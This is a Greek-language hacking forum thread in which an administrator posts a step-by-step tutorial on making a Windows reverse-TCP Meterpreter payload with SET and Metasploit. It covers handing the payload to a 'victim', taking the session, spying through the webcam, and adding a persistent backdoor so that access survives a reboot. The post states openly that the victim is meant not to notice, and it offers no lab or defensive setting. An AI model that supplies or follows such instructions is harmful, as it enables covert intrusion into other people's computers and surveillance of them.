Μετάβαση στο περιεχόμενο
  • ChatBox

    ChatBox

    Chatroom Rules

    • Το GreekHacking.Gr είναι ένα ελληνικό forum και επιτρέπεται μόνο η χρήση της Ελληνική Γλώσσας (ούτε greeklish).
    • Δεν επιτρέπονται οι βρισιές και γενικά η χρήση χυδαίας γλώσσας.
    • Απαγορεύεται αυστηρά το πορνογραφικό, προσβλητικό και βίαιο περιεχόμενο.
    • Μην χρησιμοποιείτε κεφαλαία γράμματα η σύμβολα.
Alex

Δημιουργία Backdoor (Persistence)

Recommended Posts

Alex
Διαχειριστής

Καλησπέρα, αποφάσισα να δημιουργήσω ένα Tutorial για το πως να δημιουργήσετε Backdoor Connection με το θύμα σας με την βοήθεια του SET (Setoolkit) + Metasploit.

Backdoor για όσους δεν ξέρουν είναι η πίσω πόρτα δηλαδή να παίρνουμε πρόσβαση στο θύμα μας χωρίς να μας καταλαβαίνει παράδειγμα όταν το θύμα μας κάνει Reboot / Shutdown το σύστημα του να μπορούμε να έχουμε ακόμα πρόσβαση στο σύστημα του.

Ας πάμε στο Tutorial..

[hide]

Ανοίγουμε το τερματικό ( Terminal ) και ξεκινάμε το SET με την εντολή setoolkit, έπειτα θα διαλέξετε από το menu το νούμερο 1) που είναι το Social-Engineering Attacks και μετά θα εμφανιστεί το υπό-μενού και θα διαλέξετε το νούμερο 4) το οποίο είναι 4) Create a Payload and Listener μετά θα διαλέξετε το νούμερο 2) το οποίο είναι Windows Reverse_TCP Meterpreter με αυτόν τον τρόπο δημιουργούμε το Payload μας.

Μας έχει εμφανιστεί αυτό το παράθυρο..

1.thumb.png.23dd5e96cf2453a0879399cc31d47ec8.png

Τώρα μας ζητάει να εισάγουμε την τοπική μας IP για να ακούει το payload μας σε αυτήν, για να πάρετε την τοπική σας IP ανοίξετε το τερματικό και γράψτε ifconfig και ανάλογα με το interface που έχετε θα την βρείτε.

Έπειτα θα βάλουμε ένα port στο οποίο θα ακούει το payload μας, άμα θέλουμε να κάνουμε την επίθεση πάνω στο δίκτυο μας θα βάλουμε μια random port παράδειγμα 4444 η 7777 άμα το "θύμα" σας είναι εκτός από το δίκτυο σας πρέπει να κάνετε port forwarding είτε παίρνοντας τηλέφωνο τον πάροχο σας είτε μέσα από το web interface του router σας, αυτό είναι δικό σας θέμα.

Πάμε παρακάτω...

Tώρα περιμένουμε να γίνει generate το payload μας, θα σας ρωτήσει άμα θέλετε να Do you want to start the payload and listener now? θα πατήσετε ναι. 

Τώρα έχει ξεκινήσει αυτόματα το Metasploit και έχει βάλει αυτόματα το payload και το exploit και το έτρεξε και περιμένει το θύμα μας να ανοίξει το κακόβουλο αρχείο.. και να δημιουργηθεί session.

To κακόβουλο αρχείο βρίσκετε την τοποθεσία /root/.set//payload.exe μπορείτε να το μεταφέρετε στο Desktop μέσο του Terminal με το command > mv /root/.set//payload.exe /root/Desktop

Μπορείτε να το δώσετε στο θύμα σας.. σκεφτείτε έναν καλό τρόπο.. ;) 

Αφού το θύμα σας ανοίξει το αρχείο θα δημιουργηθεί το session θα πατήσετε στο τερματικό το command session -i 1 για να πάρετε το session..

Τώρα έχετε πλήρη έλεγχο στο θύμα σας μπορείτε να πατήσετε διάφορα command μέσω του meterpreter όπως sysinfo / ps / pwd  μπορείτε να ανοίξετε shell / να ανοίξετε την camera του με την εντολή webcam_snap και φυσικά δείτε όλα τα commands με την εντολή help, τώρα άμα το θύμα σας κάνει Reboot / Shutdown το σύστημα του θα χάσετε το session για αυτό θα δημιουργήσουμε ένα backdoor μέσο του meterpreter.. 

Με την εντολή run persistence -h θα δείτε όλες τις παραμέτρους.. πάμε τώρα να δημιουργήσουμε το backdoor λοιπόν με την εντολή run persistence -U i 15 -p 4444 -r 192.168.1x δημιουργείτε το backdoor εκεί που είναι το το 4444 βάλτε το port που έχετε βάλει στο payload σας και εκεί που είναι το 192.168.1.Χ βάλτε την τοπική σας IP που βάλατε στο payload σας και είστε έτοιμη.

Αυτός ήταν ο οδηγός δεν φέρω καμία ευθύνη για τις πράξεις σας.

Ο Οδηγός είναι δικός μου και δεν έχω αντιγράψει από κανέναν site κτλπ..

Ότι απορίες έχετε στείλτε μου PM. :)

[/hide]

dfIK0AV.png

Μοιράσου αυτή την δημοσίευση


Link to post
Share on other sites

lead3r9
On 25/12/2019 at 8:37 ΜΜ, Alex said:

Καλησπέρα, αποφάσισα να δημιουργήσω ένα Tutorial για το πως να δημιουργήσετε Backdoor Connection με το θύμα σας με την βοήθεια του SET (Setoolkit) + Metasploit.

Backdoor για όσους δεν ξέρουν είναι η πίσω πόρτα δηλαδή να παίρνουμε πρόσβαση στο θύμα μας χωρίς να μας καταλαβαίνει παράδειγμα όταν το θύμα μας κάνει Reboot / Shutdown το σύστημα του να μπορούμε να έχουμε ακόμα πρόσβαση στο σύστημα του.

Ας πάμε στο Tutorial..

 

Κρυφό Περιεχόμενο
hide.png
Για να μπορέσεις να δεις το κρυφό περιεχόμενο πρέπει να απαντήσεις κάτω απο το θέμα.
Όταν απαντήσεις τότε αυτόματα το περιεχόμενο θα ξεκλειδώσει και θα είναι ορατό.
Ευχαριστούμε

 

 

Μοιράσου αυτή την δημοσίευση


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Απάντηση στο θέμα...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



ChatBox

ChatBox

Chatroom Rules

  • Το GreekHacking.Gr είναι ένα ελληνικό forum και επιτρέπεται μόνο η χρήση της Ελληνική Γλώσσας (ούτε greeklish).
  • Δεν επιτρέπονται οι βρισιές και γενικά η χρήση χυδαίας γλώσσας.
  • Απαγορεύεται αυστηρά το πορνογραφικό, προσβλητικό και βίαιο περιεχόμενο.
  • Μην χρησιμοποιείτε κεφαλαία γράμματα η σύμβολα.
×
×
  • Create New...